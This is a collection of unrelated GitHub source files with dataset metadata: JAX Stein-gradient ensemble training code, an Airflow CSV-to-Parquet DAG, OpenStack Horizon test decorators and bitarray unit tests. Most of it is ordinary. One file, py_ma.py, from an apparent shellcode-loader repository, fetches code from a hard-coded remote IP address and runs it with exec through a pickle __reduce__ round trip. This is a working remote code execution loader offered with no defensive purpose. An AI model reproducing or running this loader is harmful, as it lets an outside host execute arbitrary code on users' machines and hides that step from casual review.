return -log_prior.mean() / mean_pred.shape[-2]
def neg_total_likelihood(predictions):
log_post = neg_log_post(predictions)
log_pior = neg_log_prior(predictions)
return log_post + log_pior
log_post, log_posterior_grad = jax.vmap(value_and_grad(neg_total_likelihood, 0))(predictions)
stein_grad = (jnp.einsum('ij,jkm', k_pred, log_posterior_grad)
+ grad_k)
grad = pred_vjp(stein_grad)[0]
return log_post.mean(), grad
loss, grads = fsvgdloss(params)
updates, new_opt_state = update_fn(grads,
opt_state,
params=params)
new_params = optax.apply_updates(params, updates)
grad_norm = optax.global_norm(grads)
return new_params, new_opt_state, loss, grad_norm
def train_step(self, x, y):
self.rng, train_rng = jax.random.split(self.rng)
new_params, new_opt_state, log_post, grad_norm = self._train_step(
params=self.particles,
opt_state=self.opt_state,
x=x,
y=y,
prior_particles=self.priors,
rng=train_rng
)
self.particles = new_params
self.opt_state = new_opt_state
return log_post, grad_norm
class KDEfWGDEnsemble(FSVGDEnsemble):
def __init__(self, *args, **kwargs):
super(KDEfWGDEnsemble, self).__init__(initialize_train_fn=True,
*args,
**kwargs)
@staticmethod
def _train_fn(
predict_fn,
update_fn,
params,
opt_state,
x,
y,
prior_particles,
rng,
prior_bandwidth,
k_bandwidth
):
# mean_prior, k_prior = self._prior(prior_particles, x)
rbf = lambda z, v: rbf_kernel(z, v, bandwidth=prior_bandwidth)
kernel = lambda x: rbf(x, x) # K(x, x)
k_prior = kernel(x)
k_prior = jnp.stack([k_prior, k_prior], axis=-1)
k_rbf = lambda z, v: rbf_kernel(z, v, bandwidth=k_bandwidth)
def kdeloss(model_params):
predictions, pred_vjp = jax.vjp(lambda p: predict_fn(p, x), model_params)
k_pred, k_pred_vjp = jax.vjp(
lambda x: k_rbf(x, predictions), predictions)
grad_k = k_pred_vjp(-jnp.ones(k_pred.shape))[0]
def neg_log_post(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_post = gaussian_log_likelihood(y, mean_pred, std_pred)
return -log_post.mean()
likelihood = lambda x, cov_x: \
jax.scipy.stats.multivariate_normal.logpdf(x,
mean=jnp.zeros(x.shape[0]),
cov=cov_x + 1e-4 * jnp.eye(x.shape[0]))
likelihood = jax.vmap(likelihood, in_axes=-1, out_axes=-1)
def neg_log_prior(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_sigma = jnp.log(std_pred + EPS)
altered_predictions = jnp.stack([mean_pred, log_sigma], axis=-1)
log_prior = likelihood(altered_predictions, k_prior)
return -log_prior.mean() / mean_pred.shape[-2]
def neg_total_likelihood(predictions):
log_post = neg_log_post(predictions)
log_pior = neg_log_prior(predictions)
return log_post + log_pior
log_post, log_posterior_grad = jax.vmap(value_and_grad(neg_total_likelihood, 0))(predictions)
k_i = jnp.sum(k_pred, axis=1)
stein_grad = log_posterior_grad + jax.vmap(lambda x, y: x / y)(grad_k, k_i)
# stein_grad = (jnp.einsum('ij,jkm', k_pred, log_posterior_grad)
# + grad_k)
grad = pred_vjp(stein_grad)[0]
return log_post.mean(), grad
loss, grads = kdeloss(params)
updates, new_opt_state = update_fn(grads,
opt_state,
params=params)
new_params = optax.apply_updates(params, updates)
grad_norm = optax.global_norm(grads)
return new_params, new_opt_state, loss, grad_norm
| bizoffermark/mbse | mbse/utils/models.py | models.py | py | 16,153 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jax.vmap",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "jax.numpy.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "jax.numpy",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flax.linen.softplus",
"line_nu... |
30351327302 | from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from dag_data_processing import DataProcessing
default_args = {
'owner': 'sychen',
'start_date': datetime(2022, 9, 13),
'retries': 0,
'catchup': False,
'retry_delay': timedelta(minutes=5),
'execution_date': '{execution_date}',
}
dag = DAG('convert_csv_to_parquet',
default_args=default_args,
schedule_interval='00 23 * * *',
)
start_read_data = PythonOperator(task_id='start_read_data',
python_callable=DataProcessing.print_parquet_massage,
dag=dag)
# etl bi
parquet_operator_ProductData = PythonOperator(
task_id='read_product_data',
python_callable=DataProcessing.convert_csv_to_parquet_product_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_SalesOrderData = PythonOperator(
task_id='read_sales_order_data',
python_callable=DataProcessing.convert_csv_to_parquet_sales_order_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_customer_address = PythonOperator(
task_id='read_customer_address',
python_callable=DataProcessing.convert_csv_to_parquet_customer_address,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
parquet_operator_address_data = PythonOperator(
task_id='read_address_data',
python_callable=DataProcessing.convert_csv_to_parquet_address_data,
op_kwargs={
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
python_operator_processing = PythonOperator(task_id='start_data_processing',
python_callable=DataProcessing.print_data_processing_massage,
dag=dag)
operator_sales_profit_diff_cities = PythonOperator(
task_id='sales_profit_diff_cities',
python_callable=DataProcessing.sales_profit_diff_cities,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
operator_total_profit_top10 = PythonOperator(
task_id='total_profit_top10',
python_callable=DataProcessing.total_profit_top10,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
operator_Longest_time_span = PythonOperator(
task_id='Longest_time_span',
python_callable=DataProcessing.Longest_time_span,
op_kwargs={
"execution_date": "{{ ds }}",
"raw_path": "raw/{{ ds }}/",
"parquet_path": "parquet_file/{{ ds }}/",
"processed_path": "processed_parquet/{{ ds }}/"
},
dag=dag
)
start_read_data >> [parquet_operator_ProductData, parquet_operator_SalesOrderData,
parquet_operator_customer_address,
parquet_operator_address_data] >> python_operator_processing >> [
operator_sales_profit_diff_cities, operator_total_profit_top10, operator_Longest_time_span]
| sychen-tw/airflow_assignment | dag_parquet.py | dag_parquet.py | py | 3,732 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "airflow.DAG",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "airflow.operators.pyt... |
7349826010 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import inspect
import os
from openstack_dashboard.test.integration_tests import config
import testtools
def _is_test_method_name(method):
return method.startswith('test_')
def _is_test_fixture(method):
return method in ['setUp', 'tearDown']
def _is_test_cls(cls):
return cls.__name__.startswith('Test')
def _mark_method_skipped(meth, reason):
"""Mark method as skipped by replacing the actual method with wrapper
that raises the testtools.testcase.TestSkipped exception.
"""
@functools.wraps(meth)
def wrapper(*args, **kwargs):
raise testtools.testcase.TestSkipped(reason)
return wrapper
def _mark_class_skipped(cls, reason):
"""Mark every test method of the class as skipped."""
tests = [attr for attr in dir(cls) if _is_test_method_name(attr) or
_is_test_fixture(attr)]
for test in tests:
method = getattr(cls, test)
if callable(method):
setattr(cls, test, _mark_method_skipped(method, reason))
return cls
NOT_TEST_OBJECT_ERROR_MSG = "Decorator can be applied only on test" \
" classes and test methods."
def services_required(*req_services):
"""Decorator for marking test's service requirements,
if requirements are not met in the configuration file
test is marked as skipped.
Usage:
from openstack_dashboard.test.integration_tests.tests import decorators
@decorators.services_required("sahara")
class TestLogin(helpers.BaseTestCase):
.
.
.
from openstack_dashboard.test.integration_tests.tests import decorators
class TestLogin(helpers.BaseTestCase):
@decorators.services_required("sahara")
def test_login(self):
login_pg = loginpage.LoginPage(self.driver, self.conf)
.
.
.
"""
def actual_decoration(obj):
# make sure that we can decorate method and classes as well
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_method_skipped
# get available services from configuration
avail_services = config.get_config().service_available
for req_service in req_services:
if not getattr(avail_services, req_service, False):
obj = skip_method(obj, "%s service is required for this test"
" to work properly." % req_service)
break
return obj
return actual_decoration
def skip_because(**kwargs):
"""Decorator for skipping tests hitting known bugs
Usage:
from openstack_dashboard.test.integration_tests.tests import decorators
class TestDashboardHelp(helpers.TestCase):
@decorators.skip_because(bugs=["1234567"])
def test_dashboard_help_redirection(self):
.
.
.
"""
def actual_decoration(obj):
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip_method = _mark_method_skipped
bugs = kwargs.get("bugs")
if bugs and isinstance(bugs, collections.Iterable):
for bug in bugs:
if not bug.isdigit():
raise ValueError("bug must be a valid bug number")
obj = skip_method(obj, "Skipped until Bugs: %s are resolved." %
", ".join([bug for bug in bugs]))
return obj
return actual_decoration
def skip_new_design(obj):
if not os.environ.get('SKIP_NEW_DESIGN'):
return obj
if inspect.isclass(obj):
if not _is_test_cls(obj):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip = _mark_class_skipped
else:
if not _is_test_method_name(obj.__name__):
raise ValueError(NOT_TEST_OBJECT_ERROR_MSG)
skip = _mark_method_skipped
return skip(obj, "New design isn't supported")
| Mirantis/mos-horizon | openstack_dashboard/test/integration_tests/decorators.py | decorators.py | py | 4,977 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "testtools.testcase.TestSkipped",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "testtools.testcase",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "functools.wraps",
"line_number": 40,
"usage_type": "call"
},
{
"api_name":... |
23517490061 | #-*- coding : utf-8-*-
#coding:unicode_escape
import pickle
import ctypes,urllib.request,codecs,base64
sectr = urllib.request.urlopen('http://1.15.134.154:8088/loader.txt').read()
#sectr=str(sectr,'UTF-8')
#print(sectr)
#sectr = base64.b64decode(sectr).decode("utf-8")
class A(object):
def __reduce__(self):
return (exec, (sectr,))
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode) | God-mellon/test2 | python-shellcode和加载器(pyminifier混淆)/py_ma.py | py_ma.py | py | 469 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 5,
"usage_type": "name"
},
{
"api_name":... |
72348330343 | import pygame
from random import randint
from constants import *
class Ball:
def __init__(self, x, y):
self.x = x
self.y = y
self.RADIUS = 14
self.SPEED = 3
self.x_velocity = self.SPEED
self.y_velocity = randint(-self.SPEED, self.SPEED)
def get_pos(self):
return (self.x, self.y)
def get_rect(self):
return pygame.Rect(self.x - self.RADIUS/2, self.y- self.RADIUS/2, self.RADIUS, self.RADIUS)
def reset(self):
self.x = WINDOW_WIDTH / 2
self.y = WINDOW_HEIGHT / 2
self.x_velocity = self.SPEED
self.y_velocity = randint(-self.SPEED, self.SPEED)
def draw(self, win):
pygame.draw.circle(win, WHITE, self.get_pos(), self.RADIUS)
def check_collision(self, paddles: list):
for paddle in paddles:
if self.get_rect().colliderect(paddle.get_rect()):
delta_y = (paddle.y + paddle.HEIGHT/2) - self.y
self.y_velocity = delta_y * -0.15
self.x_velocity *= -1
return True
return False
def move(self):
if (self.x <= 0) or (self.x + self.RADIUS >= WINDOW_WIDTH):
self.reset()
if (self.y - self.RADIUS <= 0) or (self.y + self.RADIUS >= WINDOW_HEIGHT):
self.y_velocity *= -1
self.y += self.y_velocity
self.x += self.x_velocity
| goncaloinunes/pong-sockets | ball.py | ball.py | py | 1,424 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pygame.Rect",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pygame.draw.circle",
"l... |
30592921741 | print('Loading libs...')
import numpy as np
import torch
import cv2
from fastai.transforms import *
# the base model of the model we are using
# only necessay for defining the transforms
# can also be skipped but then transforms should be defined explicitly
from fastai.model import resnet34
sz=256 # size of image
print('Loading model...')
model = torch.load('models4deploy/hotdog.h5', map_location='cpu') # load model to cpu
model.eval() # turns model into prediction mode
tfms = tfms_from_model(resnet34, sz) # define transforms
print('running')
cap = cv2.VideoCapture(0) # initiate camera
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# change the channel order and make pixels in range 0-1
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)/255
proc = tfms[1](rgb) # send image through transforms
# create a flipped copy of the image, because bug is causing the model to fail when sending a single image
proc = np.stack([proc, proc[:,:,::-1]])
proc_V = V(T(proc)) # Turn the array into a torch tensor
preds = model(proc_V) # get prediction
prob = np.exp(np.mean(to_np(preds)[:,1])) # turn into mean probability
# make decision
if prob > 0.5: label = 'Not Hot Dog'
else: label = 'Hot Dog'
# flip image horizontally to give mirror effect when displaying image
rgb = (rgb[:,::-1,::-1] * 255).astype('uint8')
# Display the resulting frame with label
cv2.putText(rgb, label, (10,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,255), 3)
cv2.imshow('frame', rgb)
if cv2.waitKey(1) & 0xFF == ord('q'): # stop program when "Q" is pressed
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| cortexlogic/aiExpo | demo.py | demo.py | py | 1,723 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "torch.load",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "fastai.model.resnet34",
"line_number": 18,
"usage_type": "argument"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
... |
30481418388 | """
Tests for bitarray
Author: Ilan Schnell
"""
import os
import sys
import unittest
import tempfile
import shutil
from random import randint
is_py3k = bool(sys.version_info[0] == 3)
# imports needed inside tests
import copy
import pickle
import itertools
try:
import shelve, hashlib
except ImportError:
shelve = hashlib = None
if is_py3k:
from io import StringIO
unicode = str
else:
from cStringIO import StringIO
from bitarray import (bitarray, frozenbitarray,
bitdiff, bits2bytes, _sysinfo, __version__)
tests = []
class Util(object):
@staticmethod
def randombitarrays(start=1):
for n in list(range(start, 25)) + [randint(1000, 2000)]:
a = bitarray(endian=['little', 'big'][randint(0, 1)])
a.frombytes(os.urandom(bits2bytes(n)))
del a[n:]
yield a
@staticmethod
def randomlists():
for n in list(range(25)) + [randint(1000, 2000)]:
yield [bool(randint(0, 1)) for d in range(n)]
@staticmethod
def rndsliceidx(length):
if randint(0, 1):
return None
else:
return randint(-length-5, length+5)
@staticmethod
def slicelen(s, length):
assert isinstance(s, slice)
start, stop, step = s.indices(length)
slicelength = (stop - start + (1 if step < 0 else -1)) // step + 1
if slicelength < 0:
slicelength = 0
return slicelength
def check_obj(self, a):
self.assertEqual(repr(type(a)), "<class 'bitarray.bitarray'>")
unused = 8 * a.buffer_info()[1] - len(a)
self.assertTrue(0 <= unused < 8)
self.assertEqual(unused, a.buffer_info()[3])
def assertEQUAL(self, a, b):
self.assertEqual(a, b)
self.assertEqual(a.endian(), b.endian())
self.check_obj(a)
self.check_obj(b)
def assertStopIteration(self, it):
if is_py3k:
return
self.assertRaises(StopIteration, it.next)
if sys.version_info[:2] == (2, 6):
def assertIsInstance(self, o, t):
self.assertTrue(isinstance(o, t))
# ---------------------------------------------------------------------------
class TestsModuleFunctions(unittest.TestCase, Util):
def test_bitdiff(self):
a = bitarray('0011')
b = bitarray('0101')
self.assertEqual(bitdiff(a, b), 2)
self.assertRaises(TypeError, bitdiff, a, '')
self.assertRaises(TypeError, bitdiff, '1', b)
self.assertRaises(TypeError, bitdiff, a, 4)
b.append(1)
self.assertRaises(ValueError, bitdiff, a, b)
for n in list(range(50)) + [randint(1000, 2000)]:
a = bitarray()
a.frombytes(os.urandom(bits2bytes(n)))
del a[n:]
b = bitarray()
b.frombytes(os.urandom(bits2bytes(n)))
del b[n:]
diff = sum(a[i] ^ b[i] for i in range(n))
self.assertEqual(bitdiff(a, b), diff)
def test_bits2bytes(self):
for arg in ['foo', [], None, {}]:
self.assertRaises(TypeError, bits2bytes, arg)
self.assertRaises(TypeError, bits2bytes, 187.0)
self.assertRaises(TypeError, bits2bytes, -4.0)
self.assertRaises(TypeError, bits2bytes)
self.assertRaises(TypeError, bits2bytes, 1, 2)
self.assertRaises(ValueError, bits2bytes, -1)
self.assertRaises(ValueError, bits2bytes, -924)
self.assertEqual(bits2bytes(0), 0)
for n in range(1, 100):
self.assertEqual(bits2bytes(n), (n - 1) // 8 + 1)
for n, m in [(0, 0), (1, 1), (2, 1), (7, 1), (8, 1), (9, 2),
(10, 2), (15, 2), (16, 2), (64, 8), (65, 9),
(2**31, 2**28), (2**32, 2**29), (2**34, 2**31),
(2**34+793, 2**31+100), (2**35-8, 2**32-1),
(2**62, 2**59), (2**63-8, 2**60-1)]:
self.assertEqual(bits2bytes(n), m)
tests.append(TestsModuleFunctions)
# ---------------------------------------------------------------------------
class CreateObjectTests(unittest.TestCase, Util):
def test_noInitializer(self):
a = bitarray()
self.assertEqual(len(a), 0)
self.assertEqual(a.tolist(), [])
self.check_obj(a)
def test_endian1(self):
a = bitarray(endian='little')
a.fromstring('A')
self.assertEqual(a.endian(), 'little')
self.assertIsInstance(a.endian(), str)
self.check_obj(a)
b = bitarray(endian='big')
b.fromstring('A')
self.assertEqual(b.endian(), 'big')
self.assertIsInstance(a.endian(), str)
self.check_obj(b)
self.assertEqual(a.tostring(), b.tostring())
def test_endian2(self):
a = bitarray(endian='little')
a.fromstring(' ')
self.assertEqual(a.endian(), 'little')
self.check_obj(a)
b = bitarray(endian='big')
b.fromstring(' ')
self.assertEqual(b.endian(), 'big')
self.check_obj(b)
self.assertEqual(a.tostring(), b.tostring())
self.assertRaises(TypeError, bitarray.__new__, bitarray, endian=0)
self.assertRaises(ValueError, bitarray.__new__, bitarray, endian='')
self.assertRaises(ValueError, bitarray.__new__,
bitarray, endian='foo')
def test_integers(self):
for n in range(50):
a = bitarray(n)
self.assertEqual(len(a), n)
self.check_obj(a)
a = bitarray(int(n))
self.assertEqual(len(a), n)
self.check_obj(a)
self.assertRaises(ValueError, bitarray.__new__, bitarray, -1)
self.assertRaises(ValueError, bitarray.__new__, bitarray, -924)
def test_list(self):
lst = ['foo', None, [1], {}]
a = bitarray(lst)
self.assertEqual(a.tolist(), [True, False, True, False])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(lst)
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_tuple(self):
tup = ('', True, [], {1:2})
a = bitarray(tup)
self.assertEqual(a.tolist(), [False, True, False, True])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(tuple(lst))
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_iter1(self):
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(iter(lst))
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_iter2(self):
for lst in self.randomlists():
def foo():
for x in lst:
yield x
a = bitarray(foo())
self.assertEqual(a, bitarray(lst))
self.check_obj(a)
def test_iter3(self):
a = bitarray(itertools.repeat(False, 10))
self.assertEqual(a, bitarray(10 * '0'))
# Note that the through value of '0' is True: bool('0') -> True
a = bitarray(itertools.repeat('0', 10))
self.assertEqual(a, bitarray(10 * '1'))
def test_01(self):
a = bitarray('0010111')
self.assertEqual(a.tolist(), [0, 0, 1, 0, 1, 1, 1])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
s = ''.join([['0', '1'][x] for x in lst])
a = bitarray(s)
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
self.assertRaises(ValueError, bitarray.__new__, bitarray, '01012100')
def test_rawbytes(self): # this representation is used for pickling
for s, r in [(b'\x00', ''), (b'\x07\xff', '1'), (b'\x03\xff', '11111'),
(b'\x01\x87\xda', '10000111' '1101101')]:
self.assertEqual(bitarray(s, endian='big'),
bitarray(r))
for i in range(1, 8):
self.assertRaises(ValueError, bitarray.__new__,
bitarray, bytes(bytearray([i])))
def test_bitarray(self):
for n in range(10):
a = bitarray(n)
b = bitarray(a)
self.assertFalse(a is b)
self.assertEQUAL(a, b)
for end in ('little', 'big'):
a = bitarray(endian=end)
c = bitarray(a)
self.assertEqual(c.endian(), end)
c = bitarray(a, endian='little')
self.assertEqual(c.endian(), 'little')
c = bitarray(a, endian='big')
self.assertEqual(c.endian(), 'big')
def test_None(self):
self.assertEQUAL(bitarray(), bitarray(0))
self.assertEQUAL(bitarray(), bitarray(None))
def test_WrongArgs(self):
self.assertRaises(TypeError, bitarray.__new__, bitarray, 'A', 42, 69)
self.assertRaises(TypeError, bitarray.__new__, bitarray, Ellipsis)
self.assertRaises(TypeError, bitarray.__new__, bitarray, slice(0))
self.assertRaises(TypeError, bitarray.__new__, bitarray, 2.345)
self.assertRaises(TypeError, bitarray.__new__, bitarray, 4+3j)
self.assertRaises(TypeError, bitarray.__new__, bitarray, '', 0, 42)
self.assertRaises(ValueError, bitarray.__new__, bitarray, 0, 'foo')
tests.append(CreateObjectTests)
# ---------------------------------------------------------------------------
class ToObjectsTests(unittest.TestCase, Util):
def test_numeric(self):
a = bitarray()
self.assertRaises(Exception, int, a)
self.assertRaises(Exception, float, a)
self.assertRaises(Exception, complex, a)
def test_list(self):
for a in self.randombitarrays():
self.assertEqual(list(a), a.tolist())
def test_tuple(self):
for a in self.randombitarrays():
self.assertEqual(tuple(a), tuple(a.tolist()))
tests.append(ToObjectsTests)
# ---------------------------------------------------------------------------
class MetaDataTests(unittest.TestCase, Util):
def test_buffer_info1(self):
a = bitarray('0000111100001', endian='little')
self.assertEqual(a.buffer_info()[1:4], (2, 'little', 3))
a = bitarray()
self.assertRaises(TypeError, a.buffer_info, 42)
bi = a.buffer_info()
self.assertIsInstance(bi, tuple)
self.assertEqual(len(bi), 5)
self.assertIsInstance(bi[0], int)
if is_py3k:
self.assertIsInstance(bi[1], int)
self.assertIsInstance(bi[2], str)
self.assertIsInstance(bi[3], int)
if is_py3k:
self.assertIsInstance(bi[4], int)
def test_buffer_info2(self):
for n in range(50):
bi = bitarray(n).buffer_info()
self.assertEqual(bi[1], bits2bytes(n))
self.assertEqual(bi[3] + n, 8 * bi[1])
self.assertTrue(bi[4] >= bi[1])
def test_buffer_info3(self):
a = bitarray(endian='little')
self.assertEqual(a.buffer_info()[2], 'little')
a = bitarray(endian='big')
self.assertEqual(a.buffer_info()[2], 'big')
def test_endian(self):
a = bitarray(endian='little')
self.assertEqual(a.endian(), 'little')
a = bitarray(endian='big')
self.assertEqual(a.endian(), 'big')
def test_length(self):
for n in range(100):
a = bitarray(n)
self.assertEqual(len(a), n)
self.assertEqual(a.length(), n)
tests.append(MetaDataTests)
# ---------------------------------------------------------------------------
class SliceTests(unittest.TestCase, Util):
def test_getitem1(self):
a = bitarray()
self.assertRaises(IndexError, a.__getitem__, 0)
a.append(True)
self.assertEqual(a[0], True)
self.assertRaises(IndexError, a.__getitem__, 1)
self.assertRaises(IndexError, a.__getitem__, -2)
a.append(False)
self.assertEqual(a[1], False)
self.assertRaises(IndexError, a.__getitem__, 2)
self.assertRaises(IndexError, a.__getitem__, -3)
def test_getitem2(self):
a = bitarray('1100010')
for i, b in enumerate([True, True, False, False, False, True, False]):
self.assertEqual(a[i], b)
self.assertEqual(a[i-7], b)
self.assertRaises(IndexError, a.__getitem__, 7)
self.assertRaises(IndexError, a.__getitem__, -8)
def test_getitem3(self):
a = bitarray('0100000100001')
self.assertEQUAL(a[:], a)
self.assertFalse(a[:] is a)
aa = a.tolist()
self.assertEQUAL(a[11:2:-3], bitarray(aa[11:2:-3]))
self.check_obj(a[:])
self.assertRaises(ValueError, a.__getitem__, slice(None, None, 0))
self.assertRaises(TypeError, a.__getitem__, (1, 2))
def test_getitem4(self):
for a in self.randombitarrays(start=1):
aa = a.tolist()
la = len(a)
for dum in range(10):
step = self.rndsliceidx(la) or None
s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
self.assertEQUAL(a[s], bitarray(aa[s], endian=a.endian()))
def test_setitem1(self):
a = bitarray([False])
a[0] = 1
self.assertEqual(a, bitarray('1'))
a = bitarray(2)
a[0] = 0
a[1] = 1
self.assertEqual(a, bitarray('01'))
a[-1] = 0
a[-2] = 1
self.assertEqual(a, bitarray('10'))
self.assertRaises(IndexError, a.__setitem__, 2, True)
self.assertRaises(IndexError, a.__setitem__, -3, False)
def test_setitem2(self):
for a in self.randombitarrays(start=1):
la = len(a)
i = randint(0, la - 1)
aa = a.tolist()
ida = id(a)
val = bool(randint(0, 1))
a[i] = val
aa[i] = val
self.assertEqual(a.tolist(), aa)
self.assertEqual(id(a), ida)
self.check_obj(a)
b = bitarray(la)
b[0:la] = bitarray(a)
self.assertEqual(a, b)
self.assertNotEqual(id(a), id(b))
b = bitarray(la)
b[:] = bitarray(a)
self.assertEqual(a, b)
self.assertNotEqual(id(a), id(b))
b = bitarray(la)
b[::-1] = bitarray(a)
self.assertEqual(a.tolist()[::-1], b.tolist())
def test_setitem3(self):
a = bitarray('00000')
a[0] = 1
a[-2] = 1
self.assertEqual(a, bitarray('10010'))
self.assertRaises(IndexError, a.__setitem__, 5, 'foo')
self.assertRaises(IndexError, a.__setitem__, -6, 'bar')
def test_setitem4(self):
for a in self.randombitarrays(start=1):
la = len(a)
for dum in range(10):
step = self.rndsliceidx(la) or None
s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
lb = randint(0, 10) if step is None else self.slicelen(s, la)
b = bitarray(lb)
c = bitarray(a)
c[s] = b
self.check_obj(c)
cc = a.tolist()
cc[s] = b.tolist()
self.assertEqual(c, bitarray(cc))
def test_setslice_to_bitarray(self):
a = bitarray('11111111' '1111')
a[2:6] = bitarray('0010')
self.assertEqual(a, bitarray('11001011' '1111'))
a.setall(0)
a[::2] = bitarray('111001')
self.assertEqual(a, bitarray('10101000' '0010'))
a.setall(0)
a[3:] = bitarray('111')
self.assertEqual(a, bitarray('000111'))
a = bitarray(12)
a.setall(0)
a[1:11:2] = bitarray('11101')
self.assertEqual(a, bitarray('01010100' '0100'))
a = bitarray(12)
a.setall(0)
a[:-6:-1] = bitarray('10111')
self.assertEqual(a, bitarray('00000001' '1101'))
a = bitarray('1111')
a[3:3] = bitarray('000') # insert
self.assertEqual(a, bitarray('1110001'))
a[2:5] = bitarray() # remove
self.assertEqual(a, bitarray('1101'))
a = bitarray('1111')
a[1:3] = bitarray('0000')
self.assertEqual(a, bitarray('100001'))
a[:] = bitarray('010') # replace all values
self.assertEqual(a, bitarray('010'))
def test_setslice_to_bool(self):
a = bitarray('11111111')
a[::2] = False
self.assertEqual(a, bitarray('01010101'))
a[4::] = True # ^^^^
self.assertEqual(a, bitarray('01011111'))
a[-2:] = False # ^^
self.assertEqual(a, bitarray('01011100'))
a[:2:] = True # ^^
self.assertEqual(a, bitarray('11011100'))
a[:] = True # ^^^^^^^^
self.assertEqual(a, bitarray('11111111'))
a[2:5] = False # ^^^
self.assertEqual(a, bitarray('11000111'))
a[1::3] = False # ^ ^ ^
self.assertEqual(a, bitarray('10000110'))
a[1:6:2] = True # ^ ^ ^
self.assertEqual(a, bitarray('11010110'))
def test_setslice_to_int(self):
a = bitarray('11111111')
a[::2] = 0 # ^ ^ ^ ^
self.assertEqual(a, bitarray('01010101'))
a[4::] = 1 # ^^^^
self.assertEqual(a, bitarray('01011111'))
a.__setitem__(slice(-2, None, None), 0)
self.assertEqual(a, bitarray('01011100'))
self.assertRaises(ValueError, a.__setitem__, slice(None, None, 2), 3)
self.assertRaises(ValueError, a.__setitem__, slice(None, 2, None), -1)
def test_sieve(self): # Sieve of Eratosthenes
a = bitarray(50)
a.setall(1)
for i in range(2, 8):
if a[i]:
a[i*i::i] = 0
primes = [i for i in range(2, 50) if a[i]]
self.assertEqual(primes, [2, 3, 5, 7, 11, 13, 17, 19,
23, 29, 31, 37, 41, 43, 47])
def test_delitem1(self):
a = bitarray('100110')
del a[1]
self.assertEqual(len(a), 5)
del a[3]
del a[-2]
self.assertEqual(a, bitarray('100'))
self.assertRaises(IndexError, a.__delitem__, 3)
self.assertRaises(IndexError, a.__delitem__, -4)
a = bitarray('10101100' '10110')
del a[3:9] # ^^^^^ ^
self.assertEqual(a, bitarray('1010110'))
